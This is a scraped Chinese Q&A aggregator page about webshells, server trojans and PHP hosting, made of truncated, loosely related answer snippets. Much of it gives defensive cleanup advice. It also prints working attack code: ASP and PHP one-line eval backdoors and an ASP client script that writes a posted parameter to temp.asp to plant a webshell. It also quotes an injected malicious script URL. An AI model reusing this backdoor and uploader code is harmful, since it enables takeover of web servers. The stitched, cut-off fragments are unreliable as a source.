服务器中了php后门,文件0fuck.asp,打开后是一句话木马<%Eval(Request(chr(112))):Set fso=CreateObject
最简单的方法是把你的备份传上去。。。这样既可以无视木马,也可以保留数据的完整性。
这句话的意思是,将提交过来的PA的值赋给as99aa这个变量,然后执行as99aa里面的代码。
通常叫做一句话木马服务器端,配合客户端提交pa的值,写入一个asp木马到服务器上。
他本身不具有木马的特性。
客户端大概要这样写:
ASP URL:
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("hack")
lP.SaveToFile server.mappath("temp.asp"),2
lP.Close
set lP=nothing
response.redirect "temp.asp"
真正的ASP木马代码填在这!
你可以另存为html格式文件。查看效果。
一般在代码里需要用上execute命令来执行代码。
FTP删除不掉可能是因为黑客设置了权限,可以联系空间商协助删除,另外可以建议他们安装一个护卫神入侵防护系统,自动监控木马并隔离或删除。
FTP的权限太低了,你找服务器给你删除就可以了。一般FTP对某些文件是没有删除权限的。
用操作系统的root权限应该可以删除。 不过,最好还是搞清楚后门文件的位置和原理再删除。
网站建设的服务器安全问题怎么解决
webshell的安全问题非常重要,黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。在实用的操作中webshell的获得不仅仅能够通过破解服务器后门获得,也可以通过php。
后缀“.php”是什么
那是PHP文件,PHP一开始叫Personal Homepage后来改叫Personal Homepage Programme 最后才叫Hypertext Preprocessor。一个编写好的PHP文件你可以简单理解为一个网页,但是如果你的机子没装PHP和APACHE或IIS服务器的话是不能以网页的格式查看里面的内容的。 你如果要查看PHP文件里面的内容即源程序那么你可以用记事本打开,WORD等...
php网站什么服务器系统好?windows还是Linux??
1、windows服务器操作方便适用于php初学者,随着Windows Server2008服务器的普及,微软已经开发了适合于php的控件PHP Manager,可以用IIS7.5+PHP Manager+PHP5.3+Mysql5.5轻松搭建php环境,而且window是操作界面利用初学者维护和学习。2、Linux服务器适用于php成熟者,随着linux桌面工具的普及,已不再是简...
服务器病毒木马不断,高分请教解决办法!
Land等DOS攻击的能力,但对于正常的TCP连接是放过的,殊不知很多网络服务程序(如:IIS、Apache等Web服务器)能接受的TCP连接数是有限的,一旦有大量的TCP连接,即便是正常的,也会导致网站访问非常缓慢甚至无法访问,TCP全连接攻击就是通过许多僵尸主机不断地与受害服务器建立大量的TCP连接,直到服务器的内存等资源被耗尽而...
如何云服务器搭建php环境如何云服务器搭建php环境异常
搭建环境:根据自己和项目需求,搭建服务器运行环境。我是在镜像市场购买的免费环境(windows+mysql+apache+php+一些服务器软件),所以略过这一步。搭建网站:环境配置好后,将本地编写好网站,放在服务器软件网站目录下(Apache中htdocs)测试网站:在本地浏览器地址栏输入服务器IP地址,确认实例和网站搭建...
php服务器怎么管理php服务器怎么管理网络
本人在Linux\/Windows系统上都运行过服务器管理面板部署web开发和生产环境,从稳定性、安全性和简单易用的角度来做,我推荐如下:一、Windows服务器系统推荐phpStudy服务器管理面板 1、phpStudy服务器管理面板介绍 支持最新php、mysql版本,在不同站点可以选择不同版本php和mysql互不影响。界面简洁,操作简单,...
下面两个服务器php环境配置方案,那个好。
因为nginx特别适合大流量、负载大的业务环境使用。借助这些php面板,可以轻松配置php环境,mysql数据库,phpmyadmin、nginx等环境软件。在服务器中安装php面板后,在面板中选择php版本和mysql版本,一般php7.3,mysql5.5~5.7。在三方面板的帮助下,成功配置出可视化操作界面,然后一键部署网站环境。
阿里云服务器配置与性能优化
更换阿里云服务器有一阵了,相对于我以前的虚拟主机不是一个档次。就比如说我在虚拟主机上被人放了后门文件,我把虚拟主机上的文件传到云服务器的时侯云服务器立马就报警存在漏洞,最主要的还是可控性。一些相当配置记录下:一、配置Nginx处理日志1、设置nginx日志格式(data\/server\/nginx\/conf\/nginx.conf)log_format ...
PHP是什么?
PHP语言在数据库应用过程中,可以从数据库调取各类数据,执行效率高。首先PHP是一种广泛使用的通用开源脚本语言,特别适合于Web网站开发,它可以嵌入HTML中。60%全球互联网网站采用php技术,80%国内互联网网站使用php开发。这些网站包含购物网站,政府企业网站,论坛博客等等。PHP也是一种服务器端语言。在服务...
PHP在电脑中是什么意思啊?
到HTML文档中去执行,执行效率比完全生成HTML标记的CGI要高许多;与同样是嵌入HTML文档的脚本语言JavaScript相比,PHP在服务器端执行,充分利用了服务器的性能;PHP执行引擎还会将用户经常访问的PHP程序驻留在内存中,其他用户再一次访问这个程序时就不需要重新编译程序了,只要直接执行内存中的代码就可以了,这也是PHP高效率的...
照李鼻咽: 用操作系统的root权限应该可以删除. 不过,最好还是搞清楚后门文件的位置和原理再删除.
千山区15777521732: 服务器被中了木马,如何清除? - ?
照李鼻咽: 这是一种典型的挂马,黑客将你的服务器攻陷后(有时甚至不用攻陷),通过修改你网站代码,来达到抓肉鸡,赚取点击量或者其他什么目的. 首先,第一次出现的代码是比较原始的窗口弹出(就是将"http://iisa1.eyesir.net:7777/gethostjs.php...
千山区15777521732: php文件在浏览器中无法直接打开 - ?
照李鼻咽: php文件在浏览器中无法直接打开,是因为Php是编程语言,必须经过服务器解释才能才浏览器上浏览的一种文件. 假如本机没有运行环境是运行不了的.如果直接用ie浏览器看,会提示下载,或者出现其他问题.如果要看源代码,用类似记事...
千山区15777521732: 网站中出现<?php eval($ - POST['posha']);?> 这段代码?什么意思? - ?
照李鼻咽: 这是一个典型的后门程序,首先我解释一下eval函数的作用,1 2//eval — 把字符串作版为PHP代码执行 eval('echo 123;');//输出权123 也就是说,所有的字符串放入到eval当中,eval会把字符串解析为php代码来进行执行,那么结合$_POST['posha']的话,只要使用post传输时在name为posha的值中写入任何字符串,都可以当做php代码来执行,这个时候就有点可怕了,比如写入一段循环删除整站代码等等.
千山区15777521732: 服务器上的php项目访问不了,怎么查看错误 - ?
照李鼻咽: 首先看下浏览器返回的状态码,404表示你的PHP项目中木有默认页,500表示你的PHP项目中某个文件有硬性错误,接着呢,到php.ini中开启下出错开关,就可以发现是PHP函数或变量出错还是mysql连接出错了...,最好放截图...
千山区15777521732: 已经配置好PHP运行环境服务器,为什么浏览器打不开php文件 - ?
照李鼻咽: 把这个文件放在服务器中相应的文件夹中,和你的test.php一样的位置
千山区15777521732: 拿下webshell之后小朋友们应该怎么做 - ?
照李鼻咽: webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门.黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的. 顾 名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限.webshell常常被称为入侵者通 过网站端口对网站服务器的某种程度上操作的权限.
千山区15777521732: php 网站中病毒了 根目录生成好多php文件,怎么办?? - ?
照李鼻咽: 把你的根目录设置下权限,设置成不可写就行了,然后再逐步排查下你代码的问题
千山区15777521732: win2003服务器IIS一打开某个站点会把15M带宽占满导致访问中断! - ?
照李鼻咽: 这个对于windows其实很好检查,要利用服务器自带的“性能”工具.管理工具--性能--点【加号】--选【性能对象】---选【webservice】--选【Bytes Total/Sec】,然后把右侧所有列出的站点都加进去,然后返回到监控界面,选择【突出显示】那个灯泡图标,然后逐一点击每个网站,你就可以看到是哪个网站的流量最高了.然后就可以有针对性的限制其流量,并采取措施了.-------------------------------------------- 呵呵,放轻松,一切都会好起来的!
千山区15777521732: linux服务器中木马怎么处理 - ?
照李鼻咽: 以下从几个方面在说明Linux系统环境安排配置防范和木马后门查杀的方法:一、Web Server(以Nginx为例)1、为防止跨站感染,将虚拟主机目录隔离(可以直接利用fpm建立多个程序池达到隔离效果)2、上传目录、include类的库文件目录要...
